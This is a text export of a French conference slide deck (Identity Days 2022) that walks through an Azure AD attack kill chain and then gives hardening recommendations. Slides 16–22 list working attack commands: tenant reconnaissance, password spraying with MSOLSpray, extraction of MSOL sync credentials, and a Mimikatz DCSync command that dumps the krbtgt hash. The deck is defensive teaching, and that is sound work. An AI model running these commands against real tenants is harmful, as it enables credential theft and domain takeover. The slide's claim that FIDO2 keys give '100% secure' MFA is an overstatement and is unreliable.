  • 16. Identity Days 2022 Azure AD Kill Chain Step by step progression 😯 27 octobre 2022 - PARIS 1. Azure AD non-authenticated discovery 2. Search a valid Email account 3. Password Spraying attack 4. Change to User Authenticated session 5. Accounts: List synchronized and cloud accounts 6. Azure AD Connect: Find Sync_Sync01_guid@domain.onmicrosoft.com and AAD Connect VM name in MSOL account 7. Now, by default, all is possible! 8. If you become a local Administrator on AAD Connect, you can extract an encrypted version of MSOL account passwords via the AAD Connect SQL database or directly from LSASS.exe using the MIMICATZ tool! 9. By now, possible to carry out a DCSync attack to replicate all the password hashes of the AD domain! 😯 10. And finally, via Active Directory, exploit the AAD SSO features by recovering the PASSWORD of AZUREADSSOACC$ Otherwise, at this point, it is possible to access the Azure portal, without providing a password So, the Azure AD Connect VM must be super secure
  • 17. Identity Days 2022 Azure AD Kill Chain Tenant discovery 😯 27 octobre 2022 - PARIS https://login.microsoftonline.com/ getuserrealm.srf?login=[USERNAM E@DOMAIN]&xml=1 😯 1st info available anonymously without authentication😯 😯 1st info available anonymously without authentication😯 About your tenant:  Active or not?  Name?  Federated or not?
  • 18. Identity Days 2022 Azure AD Kill Chain Tenant discovery 😯 27 octobre 2022 - PARIS Discovery and Reco Azure Tenant Free PowerShell modules to install: GitHub - Gerenios/AADInternals: AADInternals PowerShell module for administering Azure AD and Office 365 Get tenant name, branding and DNS name Get-AADIntLoginInformation -UserName xxxx.domain.onmicrosoft.com Get tenant ID Get-AADIntTenantID -Domain testtenant.onmicrosoft.com Get all additional domains added Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com Get tenant general infos Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com 😯 Third-Party PowerShell modules to find more... 😯 😯 Third-Party PowerShell modules to find more... 😯
  • 19. Identity Days 2022 Azure AD Kill Chain Initial access + Password Spray / Brut Force 😯 MSOL Spray tool https://github.com/dafthack/MSOLSpray Import-Module MSOLSpray.ps1 Invoke-MSOLSpray -UserList .userlist.txt -Password IdentityDays$Paris%2022 Basic sample passwords files are available here: https://github.com/ohmybahgosh/RockYou2021.txt 27 octobre 2022 - PARIS
  • 20. Identity Days 2022 Azure AD Kill Chain MFA Attack + MFA Fatigue😯 27 octobre 2022 - PARIS Phishing & Man in the middle https://veruscorp.com/mfa- fatigue-leads-to-breach-of- ubers-corporate-systems/ 27/09/2022 MFA Fatigue leads to breach UBER’S Corporate users https://github.com/kgretzky/evilginx Using FIDO2 hardware keys like YubiKey provides 100% secure MFA
  • 21. Identity Days 2022 Azure AD Kill Chain Enumeration😯 27 octobre 2022 - PARIS AzureAD PowerShell Module PowerShell Gallery | AzureAD 2.0.2.140 Install-module –Name AzureAD With standard user but without special privileges! Connect-AzureAD Session state and details Get-AzureADCurrentSessionInfo Tenant details Get-AzureADTenantDetail List all AAD users Get-AzureADUser -All $true Get specific user properties Get-AzureADUser -ObjectId test@tenanttest.onmicrosoft.com Get username with “Admin’’ string” Get-AzureADUser -SearchString "admin" Get all groups with Admin string Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} Get all synchronized groups from AD to AAD Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null} Get all Azure AD groups Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null} Get all users with Global Administrator role Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember Get all Intune managed devices Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"} Get all registered Apps Get-AzureADApplication -All $true Other useful tools:  Via Azure portal  Via PowerShell  Via Azure CLI  Access the list of all users, groups, applications, devices, roles, subscriptions  Send invitations to Guest type accounts  Create security groups  Read group members  Create a new app  Add up to 50 Azure AD devices Warning: By default, an AAD user can 😯
  • 22. Identity Days 2022 Azure AD Kill Chain And finally, use of MSOL_* credentials😯 Enumeration via AD PowerShell module Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl Enumeration via Azure AD PowerShell module Get-AzureADUser -All $true | ?{$_.userPrincipalName - match "Sync_"} Once the AAD Connect has been analyzed, the credentials are extracted Get-AADIntSyncCredentials 27 octobre 2022 - PARIS The end: MSOL_*account credential + DCSync attack with MIMIKATZ runas /netonly /user:amslab.corpMSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLabkrbtgt /domain:amsLab.corp /dc:DC01.amsLab.corp"
  • 23. Azure AD Hardening ✨👍 Identity Days 2022 27 octobre 2022 - PARIS
  • 24. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Hardening Inspired by Microsoft Entra Based on customer Experience  Security projects  Assessment / audit missions  Emergency operations  Remediation
  • 25. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Hardening Always start with Azure AD Quick Wins 👍 Based on customer Experience  Security projects  Assessment / audit missions  Emergency operations  Remediation
  • 26. Identity Days 2022 Azure AD Hardening Always start with Azure AD Quick Wins 👍
  • 27. Identity Days 2022 Azure AD Hardening Part1: Enforce your Secrets 27 octobre 2022 - PARIS
  • 28. Identity Days 2022 Azure AD Hardening Part1: Enforce your Secrets 1. Use Microsoft Secured Score  Deploy MFA for EVERYONE  Enable Identity Protection (P2) 2. Use Azure AD Smart Lockout  For Azure AD cloud accounts  For hybrid accounts 3. Deploy Passwordless authentication  FIDO2 Key  Microsoft Authenticator 4. Create TWO recovery accounts  Only in Azure AD  Do not enable synchronization  Do not use MFA  Do not use FIDO2 keys  Disable password expiration  Activate a strong audit on these two accounts with:  Azure Log Analytics  Azure Sentinel  Cloud App Security (MCAS) 27 octobre 2022 - PARIS
  • 29. Identity Days 2022 Azure AD Hardening Part1: Hardening Azure MFA 1. MFA Protection 2. Auth Strengths 3. MFA Fraud alert 4. Identity Protection 27 octobre 2022 - PARIS
  • 30. Identity Days 2022 Azure AD Hardening Part2: Conditional Access Design Scope audience  Regular users  High Privilege Users  Guest / External Users  Workload identities Logical separation in AAD:  Flexibility  Granularity  Lower risk of error  More “readability”  Troubleshooting  Governance 27 octobre 2022 - PARIS
  • 31. Identity Days 2022 Azure AD Hardening Part2: Conditional Access Design Best Practices  Always test behavior  What if?  Report-only mode Area Description Authentication Policies - Enforce MFA for All administrators - Enforce MFA for all standard user - Enforce MFA for all Guest users - Block Legacy authentication - Reduce attack surface Device Access Policies - Block unsupported device platform - Require managed devices (endpoint Manager) – Admin station - Require approved app for mobile access (MAM) - Require managed devices - Specific conditional access for Mac Os (if needed) Strict Security Policies - Block MFA registration from untrusted location - Require Term of use for: All Administrator / Guest Access / Consultants - Control Sign-in Frequency - Disable persistent browser - Block foreign locations - Require trusted location for all admins - User Risk-based and Sign-in Risk based (via Identity Protection) - Authentication context  PIM / MIP labeled SharePoint site / Cloud app security upload and download - Privileged access via filters for Devices - Conditional Access for workload identities - Block all cloud app except ( Teams / SPO) for Guest Access 27 octobre 2022 - PARIS
  • 32. Identity Days 2022 Azure AD Hardening Part3: Use PIM Privileged Identity Management (Azure AD P2) PIM Best Practices  Enable PIM for privileged accounts  Enable PIM for all admin roles (Zero Trust)  Configure each role with MFA  For a Global Admin account, grant 2H max (Zero Trust)  Think about the default duration: Permanent for partners  Configure email notifications to track usage  Configure Access Reviews for PIM every week  Activate the Privileged Access group 27 octobre 2022 - PARIS
  • 33. Identity Days 2022 Azure AD Hardening Part4: Use Microsoft Defender for Identity Why use Microsoft Defender for Identity?  Hyperscale SaaS protection in Azure  Defender for Cloud App integration  Multi-forest support  Detection of DC Shadow  Continuous updates in SaaS mode  ATA Sensor & ATA Sensor Standalone  Included with EMS E5, M365 E5 and M365 Security E5 27 octobre 2022 - PARIS
  • 34. Identity Days 2022 Azure AD Hardening Part5: Identity Governance – Use new Defender for Identity workflows Create user account (status: disabled) Launch custom Logic Apps workflow Send email to hiring manager with TAP Group assignments Send welcome email to new hire Send email to onboarding DL Generate Temporary Access Pass (TAP) Start date Enable user account Add user to Teams “New Hires” channel 27 octobre 2022 - PARIS
  • 35. Identity Days 2022 Azure AD Hardening Part6: Management of externals Identities and Collaboration 27 octobre 2022 - PARIS
  • 36. Identity Days 2022 Azure AD Hardening Part6: Externals Identities and new Cross-tenant feature New Cross-tenant feature best practices  Use case 1: Configure B2B Collaboration  Use case 2: Configure B2B Direct Connect  Configure Inbound in Granular Mode with MFA + Trust Compliance Device Claims  Configure Outbound with granularity and scope your groups  Block all B2B collaboration Outbound by default  Use the Shared Channel 27 octobre 2022 - PARIS
  • 37. Identity Days 2022 ID Action Impact 01 Dedicated Condtional Access for MFA Medium 02 Dynamic group included all External / Guest users Low 03 CA Hardering : Block all cloud app except ( Teams / SPO) High 04 CA Term of use Medium 05 Restriction – Prevent download - Web only Access for sensitive Teams / SharePoint site High 06 Session timeout ( daily MFA/ Authentication) High 07 Access review for guest accounts Medium 08 Sensitivity Label for M365 groups ( Teams and sharepoint Online) High 09 Dedicated audit log for Guest / External user access High Azure AD Hardening Part7: Protect yourself against Guest and External users with 9 control points 27 octobre 2022 - PARIS
  • 38. Identity Days 2022 Azure AD Hardening Part8: Protect your Workload Identities of workloads can access Sensitive Data and Assets Source: SCIM Quarterly Analysis, July 7th, 2022 68% Source: Microsoft Security internal research 2021 Human identities Machine identities About 5 machine IDs for 1 human ID 27 octobre 2022 - PARIS
  • 39. Identity Days 2022 Azure AD Hardening Part8: Protect your Workload Identities Human identities Machine identities Future: about 20 machine IDs for 1 human ID  1: Deploy Access Review for SPNs  2: configure CAs for workload identities  3: Deploy AAD Identity Protection  4: Set up the User Consent Workflow  5: Audit and log with Defender for Cloud app / Azure Sentinel 27 octobre 2022 - PARIS
  • 40. Identity Days 2022 Azure AD Hardening Part9: Management of Externals Identities and collaboration 27 octobre 2022 - PARIS
  • 41. Identity Days 2022 Azure AD Hardening Part10: to go beyond… User Access Strategy  User admin ( Cloud Only)  PIM avec les droits nécessaires  Global Admin. : 2h  Other: 4 h  MFA / Passwordless FIDO2  Conditional Access:  Scope User Admins  Exclude: Break Glace accounts  Device : Windows  Emplacement: Trusted Location  Approve : Require Device to be marked as compliant  Identity protection  Sign-in Risk  User risk  Password Protection Privileged Access Workstation  Azure AD Autopilot profile  Compliance with Endpoint Manager  Security & Hardening Device Profile  Safety Baseline  Deny BYOD  Windows Update setup  Defender for Endpoint - Integration with Endpoint Manager 27 octobre 2022 - PARIS
  • 42. Identity Days 2022 Azure AD Hardening Part11: The tomorrow model... Enterprise Access model  Tier0  Access Control Plane  Management  Tier1  Management Plan  Data management  Application  Tier2  User access  Application access (API, …) 27 octobre 2022 - PARIS
  • 43. Identity Days 2022 Azure AD Hardening Part12: SecOps A SecOps implementation is essential  Management of unified alerts  Management of unified Incident  Log Management / Redirection  Proactivity  Automatic playbook trigger via Sentinel (remember to add Azure AD Data Connectors)  Remember to have a real Detection / Hunting and Response strategy  Don't Forget “Hunting” with KQL  Use Microsoft 365 Defender “Admin Center” 27 octobre 2022 - PARIS
  • 44. Conclusion Identity Days 2022 27 octobre 2022 - PARIS
  • 45. Zero Trust smooth deployment in 12 steps Think Hybrid and protect your On-Premise Active Directory environment! 1. Use Azure AD as your IAM 2. Manage Identity and Access 3. Provision users 4. Control All Authentications 5. Implement strong and secure Auths 6. Evaluate Authentications and Credentials 8. Determine Resource Access 7. Determine Trusted Zones 9. Apply minimum privileges 10. Secure administrative rights 11. Take advantage of Conditional Access 12. Train continuously! Modernize Identity and device management Consolidation then legacy infrastructure cleanup Configure secure access for all types of users Secure your hybrid environment Strong authentications, conditional access and intelligent strategies Secure experience for all users
  • 46. Identity Days 2021 Microsoft Documentation! Zero Trust Document Center https://docs.microsoft.com/en-us/security/zero-trust/ Monitor your Azure AD Secure Score https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity- secure-score Integrate your Apps into Azure AD https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an- application-integration Enable PHS and do not use PTA or ADFS federation Enable Seamless SSO and minimize the use of ADFS On-Premise Azure MFA + Passwordless avec FIDO2 (Yubico, …) Use PIM for IT teams Use Azure AD Identity Protection for Everyone Privileged Accounts | backup accounts | MFA | Passwordless Security Update Guide: Patch and patch again! https://msrc.microsoft.com/update-guide/ Conditional Access MFA for Guests MFA for Everyone Access policies and trusted locations Test | What If? Reports - SecOps Devices Azure AD logs (Sign-ins and applications) Users at risk: logins, locations, IP, GPS, Cloud App Security Azure Sentinel Passwords SSPR Smart Lockout Azure AD / Active Directory Password Protection Education & Communication with Users Internal training / Cyber best practices Finally, our Zero Trust “To-do list”
  • 47. Merci à tous nos partenaires ! 27 octobre 2022 - PARIS @IdentityDays #identitydays2022 Merci à tous ✨👍